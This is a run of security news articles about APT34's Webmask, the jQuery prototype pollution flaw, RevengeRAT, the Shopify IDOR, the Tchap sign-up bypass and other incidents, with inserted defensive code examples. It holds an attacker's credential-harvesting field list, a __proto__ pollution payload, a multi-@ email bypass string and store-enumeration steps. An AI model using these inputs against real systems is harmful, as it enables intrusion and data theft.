 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']

and finally it also looks for the following password fields names:

passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password','passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena', 'secret']

It is interesting to see specific string patterns such as (but not limited to) form_pw, ahd_password, upassword, senha and contrasena, which are quite indicative of victim scenarios. For example, strings such as senha, contrasena, usuario and so on seem to be Spanish/Portuguese words. If that is true (and Google Translate agrees with me), it looks like APT34 is proxying some connections that carry those username and password fields, which might point to Spanish/Portuguese targets. But this is only a hypothesis.

icap.py is also able to intercept basic authentication headers, cookies and general headers, implementing similar functions that extract interesting information and eventually modify it if needed. I won’t describe every single function, but one of the most interesting functions, worth showing, is inject_RESPMOD, which injects a tracking image into the ICAP flow. The following image shows the attacker’s implementation of the Injection_RESPMOD function.

[Image: ICAP.py: script injection function]

The injected script is added to the HTML body and eventually GZipped and shipped back. This way the attacker tracks who lands on the target domain.

Interesting points

  • WebMask is >= April 2016 (from the installed dependencies)
  • APT34 might target the ‘Arab Emirates’ (from the examples in the config files)
  • APT34 might target Spanish/Portuguese speakers (from the code in the extract_login_password function)
  • APT34 might use NovinVPS (from the examples in the config files)
  • APT34 needs credentials to change the authoritative DNS (from guide.txt)

The original post is available at the following URL:

About the Author: Marco Ramilli, founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been in charge of testing the uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – APT34, DNS attacks)



The post Iran-linked APT34: Analyzing the webmask project appeared first on Security Affairs.

EmCare reveals patient and employee data were hacked

EmCare disclosed that a number of employees’ email accounts had been hacked, potentially exposing personal information of patients and employees.

US healthcare firm EmCare Inc disclosed that a number of employees’ email accounts had been accessed, potentially exposing personal information of almost 60,000 people, including 31,000 patients.

EmCare, owned by Envision Healthcare, is a leading provider of physician jobs for emergency medicine, inpatient physician services, radiology management programs and other healthcare services.


It has more than 700 practices at locations ranging from major hospitals and health systems to rural hospitals and ambulatory care centers.

“EmCare, Inc. and its affiliates (EmCare) recently became aware that an unauthorized third party obtained access to a number of EmCare employees’ email accounts. EmCare provides physician services.” reads the incident notice published by the company.

“Patients impacted by this incident may have received medical care from a clinician employed by or engaged with an affiliate of EmCare. These services may have been provided in an Emergency Department or as inpatient services in a hospital.”

The company discovered the intrusion on February 19: hackers had compromised some employees’ email accounts and gained access to some patients’, employees’ and contractors’ personal information.

“On Feb. 19, 2019, EmCare determined that the impacted email accounts contained some patients’, employees’ and contractors’ personal information, including name, date of birth or age, and for some patients, clinical information. In addition, in some instances, Social Security and driver’s license numbers were impacted.” continues the notice.

At the time of publishing, the company pointed out that there is no evidence to suggest that the information has been misused.

The extent of the security incident is still unclear; we have no information about the number of accounts that were accessed by the intruders. The company did not provide technical details about the hack.

In my humble opinion, the fact that employees were keeping patients’ data unprotected in their email accounts is very disturbing.

EmCare will offer identity protection and credit monitoring services for patients and employees whose Social Security or driver’s license numbers were exposed in the incident.

“As a general precautionary measure, individuals should remain vigilant about protecting themselves against potential fraud or identity theft by, among other things, reviewing their account statements and monitoring credit reports closely.” concludes the notice.

“If individuals detect any suspicious activity on an account, they should promptly notify the financial institution or company with which the account is maintained. They should also promptly report any fraudulent activity or any suspected incidents of identity theft to the proper law enforcement authorities, including the police and their state’s attorney general.”

Pierluigi Paganini

(SecurityAffairs – EmCare, data breach)

The post EmCare reveals patient and employee data were hacked appeared first on Security Affairs.

jQuery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites

The popular jQuery JavaScript library is affected by a rare prototype pollution vulnerability that could allow attackers to modify a JavaScript object’s prototype.

The impact of the issue could be severe, considering that the jQuery JavaScript library is currently used on 74 percent of websites online; most sites still use the 1.x and 2.x versions of the library, which are affected by the ‘Prototype Pollution’ vulnerability.

This week the library received a security patch to address the issue, three years after the last major security flaw discovered in its code.

JavaScript objects are like variables that can be used to store multiple values based on a predefined structure. Prototypes are used to define a JavaScript object’s default structure and default values; they are essential for specifying an expected structure when no values are set.

An attacker who is able to modify a JavaScript object prototype can crash an application or change its behavior when it does not receive the expected values.


Due to the widespread use of JavaScript, the exploitation of prototype pollution flaws could have serious consequences for web applications.

The vulnerability in the jQuery library (CVE-2019-11358) was discovered by researchers at Snyk that also published a proof of concept code for a prototype pollution attack.

“This security vulnerability referred to and manifests as prototype pollution, enables attackers to overwrite a JavaScript application object prototype.” reads the analysis published by Snyk. “When that happens, properties that are controlled by the attacker can be injected into objects and then either lead to denial of service by triggering JavaScript exceptions, or tamper with the application source code to force the code path that the attacker injects.”

The experts demonstrated that exploiting the flaw attackers can assign themselves admin rights on a web app that uses the jQuery library code.

Fortunately, according to the experts, this prototype pollution issue is not exploitable for mass-attacks because the exploit code must be crafted for each specific target.

Web developers using jQuery JavaScript library for their applications are advised to update their projects to the latest jQuery version, v3.4.0.

“jQuery 3.4.0 includes a fix for some unintended behavior when using jQuery.extend(true, {}, …). If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype. This fix is included in jQuery 3.4.0, but patch diffs exist to patch previous jQuery versions,” reads the blog post published by the jQuery team.
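As an added example (neither jQuery’s code nor Snyk’s proof of concept), a deep “extend” in the pre-3.4.0 style beside a hardened form and a boundary check for untrusted JSON; the attacker-style document and the property names are constructed, and skipping “constructor” and “prototype” is an extra precaution assumed here beyond the __proto__ case the page describes.

```javascript
// Added example (not jQuery's code and not Snyk's proof of concept): a deep
// "extend" in the pre-3.4.0 style, the hardened form, and a boundary check.
// Runs under Node.js or in a browser console, no dependencies.

function isPlainObject(value) {
  return Object.prototype.toString.call(value) === "[object Object]";
}

// Vulnerable: walks every enumerable key of the source, including an own
// "__proto__" key produced by JSON.parse. For that key, target[key] resolves
// to Object.prototype, so the recursion writes into the global prototype.
function extendVulnerable(target, source) {
  for (const key in source) {
    const src = source[key];
    if (isPlainObject(src)) {
      if (!isPlainObject(target[key])) target[key] = {};
      extendVulnerable(target[key], src);
    } else {
      target[key] = src;
    }
  }
  return target;
}

// Hardened: skip "__proto__" (the key the 3.4.0 fix guards against) and, as
// an extra precaution assumed here, "constructor" and "prototype"; only own
// keys are copied and nested targets are always fresh own objects.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function extendSafe(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const src = source[key];
    if (isPlainObject(src)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || !isPlainObject(target[key])) {
        target[key] = {};
      }
      extendSafe(target[key], src);
    } else {
      target[key] = src;
    }
  }
  return target;
}

// Boundary check for untrusted JSON: true if any nested key could reach a
// prototype, so a request can be rejected before any merge happens.
function hasPollutionKeys(value) {
  if (!isPlainObject(value)) return false;
  return Object.keys(value).some(
    (k) => FORBIDDEN_KEYS.has(k) || hasPollutionKeys(value[k])
  );
}

// Merges a constructed attacker-style document into fresh settings, then
// checks whether an unrelated object inherited "isAdmin". Cleans up after
// itself so one run cannot taint the next.
function demonstrate(extendFn) {
  const untrusted = JSON.parse('{"theme":"dark","__proto__":{"isAdmin":true}}');
  const settings = extendFn({}, untrusted);
  const unrelated = {};
  const polluted = unrelated.isAdmin === true;
  delete Object.prototype.isAdmin;
  return { theme: settings.theme, polluted };
}
```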

Pierluigi Paganini

(SecurityAffairs – hacking, jQuery JavaScript library )


The post jQuery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites appeared first on Security Affairs.

Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT

Palo Alto Networks Unit 42 researchers uncovered a malicious campaign targeting entities in North America, Europe, Asia, and the Middle East with RevengeRAT.

The campaign was carried out during March; threat actors tracked as “Aggah” used pages hosted on Bit.ly, BlogSpot, and Pastebin as command-and-control (C2) infrastructure to distribute RevengeRAT.

Attackers hit organizations in several industries, including technology, retail, manufacturing, state/local government, hospitality, medical, and other professional businesses.

“In March 2019, Unit 42 began looking into an attack campaign that appeared to be primarily focused on organizations within a Middle Eastern country.” reads the analysis published by Palo Alto Networks.

“Further analysis revealed that this activity is likely part of a much larger campaign impacting not only that region but also the United States, and throughout Europe and Asia.”

The usage of legitimate services to deliver the malware aims at avoiding detection.

RevengeRAT variants were used by different APT groups, such as the Gorgon Group, which hit entities in the UK, Spain, Russia and the US. The source code of the RAT was publicly leaked a few years ago and could well be part of multiple campaigns conducted by several threat actors.

RevengeRAT allows attackers to open remote shells on the infected system, manage system files, processes, and services, log keystrokes, edit the Windows Registry, edit the hosts file, dump user passwords, access the webcam, and perform many more actions.

The researchers analyzed a bait document built to load a malicious macro-enabled document from a remote server via Template Injection.

“These macros use BlogSpot posts to obtain a script that uses multiple Pastebin pastes to download additional scripts, which ultimately result in the final payload being RevengeRAT configured with a duckdns[.]org domain for C2.” continues the analysis.

“During our research, we found several related delivery documents that followed the same process to ultimately install RevengeRAT hosted on Pastebin, which suggests the actors used these TTPs throughout their attack campaign.”

Once a victim opens the decoy document, it displays a lure image designed to trick them into turning on Microsoft Office macros by clicking “Enable Editing.” If the victim enables the macros, a remote OLE document containing the malicious macro is loaded using template injection.

The OLE file loaded an embedded Excel document, which would download a malicious script from a shortened URL using the Bit.ly service. In a similar way, in other attacks the malicious code was downloaded from a Blogspot domain hosting malicious JavaScript.

“The malicious script carries out several activities on the compromised system. First, it attempts to hamper Microsoft Defender by removing its signature set. The script also kills the Defender process along with the processes for several Office applications.” reads the analysis.

Experts pointed out that the technique of enabling macros and disabling Protected View in Office, and the tactic of killing the processes of Windows Defender and Microsoft Office applications, were employed by the Gorgon group in past campaigns.

Once downloaded on a victim’s machine, the script performs the following main actions:

  • Downloading a payload from a Pastebin URL
  • Creating a scheduled task to periodically obtain and run a script from a Pastebin URL
  • Creating an autorun registry key to obtain and run a script from a Pastebin URL

The last-stage malware, downloaded from Pastebin, is a RevengeRAT variant dubbed “Nuclear Explosion” that uses the lulla.duckdns[.]org domain as C2.


The analysis of a single bit.ly shortened URL revealed it was clicked over 1,900 times by targets from roughly 20 countries; this data gives an idea of the extent of the campaign.

The analysis of the decoy document’s properties allowed the experts to discover a number of other RevengeRAT samples used in this campaign.

Despite this, the Palo Alto Networks researchers conclude that there is no “concrete evidence that this attack campaign is associated with Gorgon.”

Pierluigi Paganini

(SecurityAffairs – hacking, RevengeRAT)


The post Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT appeared first on Security Affairs.

A flaw in Shopify API flaw exposed revenue and traffic data of thousands of stores

A researcher discovered a high-severity flaw in the Shopify e-commerce platform that could have been abused to expose the traffic and revenue data of stores.

Bug bounty hunter Ayoub Fathi discovered a vulnerability in a Shopify API endpoint that could be exploited to leak the revenue and traffic data of thousands of stores.

The Shopify platform is currently used by 800,000 different online merchants in more than 175 countries.


The white hat hacker analyzed the APIs published over the past year by Shopify that allow users to fetch sales data for graph presentations. He noticed that the system was leaking the revenue data of two unnamed Shopify stores, one of which had been removed from the platform.

The researcher carried out a mass check on all the existing stores to determine whether the platform was affected by an Insecure Direct Object Reference (IDOR) issue, iterating over $storeName.

Fathi decided to perform a mass check on all existing stores to see whether any customer information would leak through the API.

“The first idea that came to mind is to perform a mass check on eventually all existing stores, and see if we would get any customer data out of any.” reads a post published by the researcher.

“The attack process will be as follows:

  • Building a wordlist of store names (from storeName.myshopify.com);
  • Iterate the wordlist against the almost vulnerable endpoint: /shops/$storeName/revenue_data.json
  • Filtering out the vulnerable domains;
  • Analyzing affected stores to figure out the root cause of the observed behaviour or eventual vulnerability.”

Fathi found that 4 out of 1000 stores (one of which was closed) were vulnerable. The researcher then decided to run a further test using a larger dataset, containing 813,684 records, built from Forward DNS (FDNS) data.

“Using this approach, we don’t need to generate store names from a given domain list. Instead, we will be using the FDNS to obtain reverse CNAME records of shops.myshopify.com (which all the stores point to) ” continues the expert. “Now, we will be looking for CNAME records that match shops.myshopify.com where Shopify merchants are hosting their stores.”

The researcher created an exploit.py script to run the new word list of 813K store names.

Using this approach the expert retrieved a list of vulnerable stores and queried them to get each store’s monthly revenue data in USD over its lifetime.

“This was tested on 800K merchant stores, +12,100 of them were exposed, +8700 were vulnerable stores that we were able to obtain their sales and traffic data and they should not be public, and 3400 are expected to have their sales data public” wrote Fathi “to summarize:

  • This was tested on +800K stores
  • +12,100 were exposed
  • +8700 stores were vulnerable and their data is set to private.
  • Only +3400 stores data was expected to be public.”

The researcher discovered that the leak was caused by the Shopify Exchange App.

“Based on above data and a few more days of research, I came to the conclusion that this was caused by Shopify Exchange App (Actively used by merchants now) which was introduced only a few months before this vulnerability. Any merchant who has Exchange App installed would be vulnerable.” states Fathi.
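As an added illustration (not Shopify's code), here is an object-level authorization check of the kind that prevents this class of leak, modelled on the endpoint above; the stores, owners, figures and the Exchange-listing flag that stands in for the reported root cause are all constructed assumptions:

```python
"""Added example (not Shopify's code): an object-level authorization check
for a per-store endpoint such as /shops/<storeName>/revenue_data.json.
All store names, owners and figures below are constructed."""
from dataclasses import dataclass, field


@dataclass
class Store:
    name: str                      # the <storeName> part of storeName.myshopify.com
    owner: str                     # account that may read private figures
    sales_public: bool             # merchant chose to publish sales data
    exchange_listed: bool          # store has the Exchange app installed (assumed flag)
    monthly_revenue_usd: dict = field(default_factory=dict)
    closed: bool = False


# Constructed sample data: owners, names and figures are made up.
STORES = {
    "alpha-goods": Store("alpha-goods", "alice", False, True,
                         {"2018-09": 1200.0, "2018-10": 1450.5}),
    "beta-books": Store("beta-books", "bob", True, True,
                        {"2018-09": 300.0, "2018-10": 280.0}),
    "gamma-gear": Store("gamma-gear", "grace", False, False,
                        {"2018-09": 9800.0, "2018-10": 10250.0}),
    "delta-shop": Store("delta-shop", "dan", False, True,
                        {"2018-05": 50.0}, closed=True),
}


class Forbidden(Exception):
    """Raised when the requester may not read the store's revenue data."""


def revenue_data_vulnerable(requester: str, store_name: str) -> dict:
    """IDOR-style handler: the store is looked up by the user-controlled name
    and the requester's identity is never compared with the store owner.
    Hypothetical root cause modelled on the article: a store listed on
    Exchange is treated as if its figures were public."""
    store = STORES.get(store_name)
    if store is None:
        raise KeyError(store_name)
    if store.sales_public or store.exchange_listed:
        return {"store": store.name, "revenue_usd": store.monthly_revenue_usd}
    raise Forbidden(store_name)


def revenue_data_hardened(requester: str, store_name: str) -> dict:
    """Hardened handler: private figures go only to the owner, an Exchange
    listing does not override the merchant's privacy setting, and a closed
    store is 'not found' for everyone but its owner, so its historical
    figures cannot be enumerated."""
    store = STORES.get(store_name)
    if store is None or (store.closed and requester != store.owner):
        raise KeyError(store_name)
    if requester == store.owner or store.sales_public:
        return {"store": store.name, "revenue_usd": store.monthly_revenue_usd}
    raise Forbidden(store_name)


def exposed_private_stores(handler, requester: str = "anonymous") -> list:
    """Audit helper: which stores with private sales data does a handler
    still serve to an unrelated requester?"""
    leaked = []
    for name, store in STORES.items():
        if store.sales_public:
            continue
        try:
            handler(requester, name)
        except (Forbidden, KeyError):
            continue
        leaked.append(name)
    return sorted(leaked)
```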

Fathi reported the flaw to Shopify on 13 October 2018; the company acknowledged it on October 16 and closed it on November 1.

The bad news is that Shopify did not award the expert a bounty, citing policy violations, because he tested shops that were not created for testing purposes.

Below an excerpt of the email Shopify sent to the expert:

“While we appreciate you were trying to demonstrate the impact of the identified issue, intentionally accessing information of other merchants and not immediately reporting this to us is of significant concern to Shopify. As a result, this report will not be awarded a bug bounty.”

Pierluigi Paganini

(SecurityAffairs – hacking, VSDC)

The post A flaw in Shopify API flaw exposed revenue and traffic data of thousands of stores appeared first on Security Affairs.

Security Affairs newsletter Round 210 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.


Once again thank you!

Attackers hacked support agent to access Microsoft Outlook email accounts
Major coordinated disinformation campaign hit the Lithuanian Defense
Romanian duo convicted of fraud Scheme infecting 400,000 computers
Security Affairs newsletter Round 209 – News of the week
Whatsapp, Instagram, Facebook down worldwide
A new DDoS technique abuses HTML5 Hyperlink Audit Ping in massive attacks
Apache fixed an important RCE flaw in Tomcat application server
Gnosticplayers round 5 – 65 Million+ fresh accounts from 6 security breaches available for sale
Gnosticplayers round 5 – 65 Million+ fresh accounts from 8 security breaches available for sale
Locked Shields 2019 – Chapeau, France wins Cyber Defence Exercise
Yellow Pencil WordPress Plugin flaw expose tens of thousands of sites
Adblock Plus filter can be exploited to execute arbitrary code in web pages
Blue Cross of Idaho data breach, 5,600 customers affected
CVE-2019-0803 Windows flaw exploited to deliver PowerShell Backdoor
Ecuador suffered 40 Million Cyber attacks after the Julian Assange arrest
FireEye releases FLASHMINGO tool to analyze Adobe Flash files
Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading
A new variant of HawkEye stealer emerges in the threat landscape
Code execution – Evernote
eGobbler hackers used Chrome bug to deliver 500Million+ ads to iOS users
European Commission is not in possession of evidence of issues with Kaspersky products
Justdial is leaking personal details of all customers real-time
RCE flaw in Electronic Arts Origin client exposes gamers to hack
Analyzing OilRigs malware that uses DNS Tunneling
APT28 and Upcoming Elections: evidence of possible interference (Part II)
Cisco addresses a critical bug in ASR 9000 series Routers
Drupal patched security vulnerabilities in Symfony, jQuery
Facebook ‘unintentionally collected contacts from 1.5 Million email accounts without permission
Russian TA505 threat actor target financial entities worldwide
Broadcom WiFi Driver bugs expose devices to hack
Facebook admitted to have stored millions of Instagram users passwords in plaintext
Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison
Ransomware attack knocks Weather Channel off the Air
Source code of tools used by OilRig APT leaked on Telegram
Avast, Avira, Sophos and other antivirus solutions show problems after
Google is going to block logins from embedded browsers against MitM phishing attacks
Hacker broke into super secure French Governments Messaging App Tchap hours after release
Marcus Hutchins pleads guilty to two counts of banking malware creation

Pierluigi Paganini

(SecurityAffairs – newsletter)



The post Security Affairs newsletter Round 210 – News of the week appeared first on Security Affairs.

Google is going to block logins from embedded browsers against MitM phishing attacks

Google this week announced that it is going to block login attempts from embedded browser frameworks to prevent man-in-the-middle (MiTM) phishing attacks.

Phishing attacks carried out by injecting malicious content in legitimate traffic are difficult to detect when attackers use an embedded browser framework or any other automated tool for authentication.

For example, Google offers the Chromium Embedded Framework (CEF), which allows embedding Chromium-based browsers in other applications.

Google announced that starting from June, it will block sign-ins from these frameworks.

“However, one form of phishing, known as “man in the middle” (MITM), is hard to detect when an embedded browser framework (e.g., Chromium Embedded Framework – CEF) or another automation platform is being used for authentication. MITM intercepts the communications between a user and Google in real-time to gather the user’s credentials (including the second factor in some cases) and sign in.” reads a blog post published by Google. “Because we can’t differentiate between a legitimate sign in and a MITM attack on these platforms, we will be blocking sign-ins from embedded browser frameworks starting in June. This is similar to the restriction on webview sign-ins announced in April 2016.”


Google suggests that developers currently using CEF for authentication switch to browser-based OAuth authentication.

Browser-based OAuth authentication also lets users see the full URL of the page where they are entering their credentials, which helps them avoid phishing websites mimicking legitimate ones.

“The solution for developers currently using CEF for authentication is the same: browser-based OAuth authentication. Aside from being secure, it also enables users to see the full URL of the page where they are entering their credentials, reinforcing good anti-phishing practices,” continues Google.

“If you are a developer with an app that requires access to Google Account data, switch to using browser-based OAuth authentication today.”

Pierluigi Paganini

(SecurityAffairs – hacking, MiTM phishing attack)

The post Google is going to block logins from embedded browsers against MitM phishing attacks appeared first on Security Affairs.

Hacker broke into super secure French Government’s Messaging App Tchap hours after release

A white hat hacker discovered how to break Tchap, a new secure messaging app launched by the French government for officials and politicians.

The popular French white hat hacker Robert Baptiste (aka @fs0c131y) discovered how to break into Tchap, a new secure messaging app launched by the French government for encrypted communications between officials and politicians.
The app was developed by DINSIC (Interministerial Directorate of Digital and Information System and Communication of the State), as a project controlled by France’s National Cybersecurity Agency (ANSSI).

It aims at replacing popular instant messaging services like Telegram and WhatsApp for government people.

Tchap was launched on April 18 and is available on the official iOS and Android app stores, but only French government employees (using @gouv.fr or @elysee.fr email accounts) can sign up for an account.

The key point of Tchap is that encrypted communications flow through internal servers to prevent cyber attacks carried out by foreign nation-state actors.

The French government also published Tchap's source code on GitHub; it is based on Riot, a well-known open-source instant messaging client-server package.

News of the day is that Robert Baptiste found a security bug that could allow anyone to sign up for an account with the Tchap app and access groups and channels without using an official government email account.

The expert performed a dynamic analysis of the mobile app and discovered that it implements certificate pinning in the authentication process. After disabling the pinning with Frida, he observed that during the registration process the app requests a token.


The expert noticed that, depending on the email address provided by the user, the app refers to the "correct" id_server. The list of available servers is defined in the AndroidManifest.xml.

“I set id_server to matrix.agent.elysee.tchap.gouv.fr. For info, Elysée is the French presidential palace. As I chose this server I guessed I should have an @elysee.fr email address. So, in the requestToken request, I modified email to fs0c131y@protonmail.com@elysee.fr. Hum, no validation email in my inbox… Wait, maybe it is waiting for a known @elysee.fr email address. So I did a Google search “email @elysee.fr”” wrote the expert in a blog post.

“So I did another try, and in the requestToken request I modified email to fs0c131y@protonmail.com@presidence@elysee.fr. Bingo! I received an email from Tchap, I was able to validate my account!”

The expert demonstrated how to create an account with the service using a regular email ID by exploiting a potential email validation vulnerability in the Android version of the Tchap app.

After logging in as an Elysée employee, he was able to access the public rooms.
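Added example, not code from Tchap, Riot or the researcher: a domain allow-list check that looks only at the address suffix beside a strict one that parses the whole address. The allowed domains and sample addresses are constructed, and the naive check is an assumed model of the kind of validation a multi-'@' address can slip past.

```python
"""Added example (not Tchap's or Riot's code): naive versus strict
government-domain validation for sign-up email addresses."""
import re

ALLOWED_DOMAINS = {"gouv.fr", "elysee.fr"}          # constructed allow-list

# One local part, one '@', then dot-separated labels of letters, digits and
# hyphens (not starting or ending with a hyphen) and an alphabetic TLD.
_MAILBOX = re.compile(
    r"^[A-Za-z0-9._%+-]+@"
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?\.)+[A-Za-z]{2,}$"
)


def is_allowed_naive(email: str) -> bool:
    """Suffix check only: passes any string that ends in '@' + an allowed
    domain, however many '@' signs precede it. This is an assumed model of
    the class of check the reported address slipped past."""
    return any(email.lower().endswith("@" + d) for d in ALLOWED_DOMAINS)


def is_allowed_strict(email: str) -> bool:
    """Accept only a single well-formed mailbox whose entire domain, not a
    suffix of it and not merely the part after the last '@', is allowed."""
    email = email.strip()
    if email.count("@") != 1 or not _MAILBOX.match(email):
        return False
    domain = email.rsplit("@", 1)[1].lower()
    return domain in ALLOWED_DOMAINS


def compare(addresses):
    """Map each address to (naive verdict, strict verdict) for review."""
    return {a: (is_allowed_naive(a), is_allowed_strict(a)) for a in addresses}


# Constructed sample addresses (no real mailboxes).
SAMPLE_ADDRESSES = [
    "agent@elysee.fr",
    "service@gouv.fr",
    "attacker@mail.example@presidence@elysee.fr",   # same shape as the reported bypass
    "agent@elysee.fr.attacker.example",             # allowed domain as a prefix
]

if __name__ == "__main__":
    for address, verdicts in compare(SAMPLE_ADDRESSES).items():
        print(f"{address:45} naive={verdicts[0]!s:5} strict={verdicts[1]}")
```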


Robert reported the issue to the Matrix team, which developed the Riot client, and it quickly fixed the bug and released a patch. The released patch was specific to the application developed by French intelligence.

Incidentally, last week Matrix.org warned users of a security breach: a hacker gained unauthorized access to the production databases, including unencrypted message data, access tokens, and password hashes.

According to Matrix.org, the attacker has exploited a known vulnerability in the Jenkins open source automation server to hijack credentials and gain access to the systems of the organization. Homeservers, source code and packages, identity servers, and Modular.im servers were not impacted.

Pierluigi Paganini

(SecurityAffairs – hacking, Tchap app)

The post Hacker broke into super secure French Government’s Messaging App Tchap hours after release appeared first on Security Affairs.

Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison

Djevair Ametovski was sentenced to 90 months in prison for operating an international cybercrime marketplace named Codeshop.

Macedonian national Djevair Ametovski (32) was sentenced to 90 months in prison by US DoJ authorities for operating an international cybercrime marketplace named Codeshop.

Codeshop.su was a website that specialized in selling stolen payment card data. Ametovski acquired payment card data from hackers who had stolen it from financial institutions and individuals.

According to the investigators, the man commercialized data of 181,000 payment cards between 2010 and 2014.


Ametovski (known online as Codeshop, Sindromx, xhevo, and Sindrom) was arrested by Slovenian authorities in January 2014, at the time he was charged with aggravated identity theft, access device fraud conspiracy, and wire fraud conspiracy. The Macedonian citizen was extradited to the United States in May 2016.

The man pleaded guilty to access device fraud and aggravated identity theft, he was also ordered to forfeit $250,000 and pay restitution that will be determined later.

Codeshop customers were able to buy stolen card data searching for specific types of data based on criteria such as country, bank, and bank identification number.

“The stolen data could then be used to make online purchases and to encode plastic cards to withdraw cash at ATMs.” reads the press release from the Justice Department.

“Ametovski used a network of online money exchangers and anonymous digital currencies, including Bitcoin, to reap revenues from the Codeshop website and to conceal all participants’ identities, including his own. Over the course of the scheme, Ametovski obtained and sold stolen credit and debit card data for more than 1.3 million cards,” said the Justice Department.

Pierluigi Paganini

(SecurityAffairs – Codeshop, carding)

The post Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison appeared first on Security Affairs.

Source code of tools used by OilRig APT leaked on Telegram

Lab Dookhtegan hackers leaked details about operations carried out by Iran-linked OilRig group, including source code of 6 tools.

A hacker group that goes online with the name Lab Dookhtegan has disclosed details about operations conducted by the Iran-linked cyber-espionage group tracked as OilRig, APT34, and HelixKitten.

OilRig is an Iran-linked APT group that has been around since at least 2014, it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

The Lab Dookhtegan hackers used a Telegram channel to dump information about the OilRig infrastructure, revealing details about its hacking tools, members, and operations. The hackers also disclosed IP addresses and domains involved in operations conducted by the group over the years.

OilRig dump (Source: ZDNet)

It seems that the tools have been leaked since mid-March on a Telegram channel by a user with the Lab Dookhtegan pseudonym.

The dump also includes OilRig victims’ data, including login credentials to several services obtained through phishing attacks.

The entity that leaked the information aimed at disrupting the operations of the Iran-linked hacking group; it is likely an opponent of the regime.

Lab Dookhtegan leaked the source code of the following six hacking tools, along with data contained in the compromised admin panels:

  • Glimpse (aka BondUpdater), the latest version of the PowerShell-based trojan;
  • PoisonFrog, an older version of BondUpdater;
  • HyperShell web shell (aka TwoFace);
  • HighShell web shell;
  • Fox Panel phishing tool;
  • Webmask, the main tool behind DNSpionage;

According to Chronicle, Dookhtegan leaked data from 66 victims in private industry and Government organizations, most from the Middle East, Africa, East Asia, and Europe.

The list of victims includes Etihad Airways and Emirates National Oil; the hackers also hit individuals in many industries, including energy, transportation, and financial services.

Lab Dookhtegan also doxxed Iranian Ministry of Intelligence officers: the leak shared phone numbers, images, social media profiles, and names of officers involved in APT34 operations.

“We have more secret information about the crimes of the Iranian Ministry of Intelligence and its managers and we are determined to continue to expose them,” Dookhtegan said in a Telegram message.

No doubt, the leak will have a severe impact on the future operations of the OilRig group.

Pierluigi Paganini

(SecurityAffairs – hacking, OilRig)

The post Source code of tools used by OilRig APT leaked on Telegram appeared first on Security Affairs.

Ransomware attack knocks Weather Channel off the Air

A ransomware attack knocked the Weather Channel off the air for at least 90 minutes on Thursday morning; federal law enforcement is investigating the incident.

A cyber attack hit the Weather Channel and forced it off the air for at least 90 minutes.

The broadcaster confirmed via Twitter that the incident is the result of a cyber attack, it claims that the problems were caused by “a malicious software attack on the network.”

Details are scant at the moment and a tweet from the station does not lift the haze, informing only that it was the victim of “a malicious software attack on the network.”

This morning the broadcaster aired taped programming (“Heavy Rescue”) instead of the “AMHQ” live show.

The live show started more than 90 minutes late, with the anchors informing viewers of the cyber attack. IT staff restored normal operations from backups.


Federal law enforcement immediately started an investigation into the case; at the time, The Weather Channel did not disclose technical details about the attack.

According to 11 Alive News, the attack was caused by ransomware, a circumstance confirmed by the Feds to The Wall Street Journal. The live show was interrupted by a ransomware attack, likely an attempt to extort money from the broadcaster.

Ransomware attacks continue to represent a serious threat to companies and organizations; it is essential to adopt good cyber hygiene by using defence software, keeping applications up to date and implementing an effective backup policy.

Pierluigi Paganini

(SecurityAffairs – ransomware, Weather Channel)




The post Ransomware attack knocks Weather Channel off the Air appeared first on Security Affairs.

Broadcom WiFi Driver bugs expose devices to hack

Experts warn of security flaws in the Broadcom WiFi chipset drivers that could allow potential attackers to remotely execute arbitrary code and to trigger DoS.

According to a DHS/CISA alert and a CERT/CC vulnerability note, Broadcom WiFi chipset drivers are affected by security vulnerabilities impacting multiple operating systems. The flaws could be exploited to remotely execute arbitrary code and to trigger a denial-of-service condition.

“The CERT Coordination Center (CERT/CC) has released information on multiple vulnerabilities in Broadcom Wi-Fi chipset drivers. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.” reads the alert published by the DHS/CISA.

“The Broadcom wl driver and the open-source brcmfmac driver for Broadcom WiFi chipsets contain multiple vulnerabilities. The Broadcom wl driver is vulnerable to two heap buffer overflows, and the open-source brcmfmac driver is vulnerable to a frame validation bypass and a heap buffer overflow.” reads the security advisory published by the CERT/CC.

The CERT/CC vulnerability note includes a list of all vendors potentially impacted by the flaws in Broadcom WiFi chipsets.

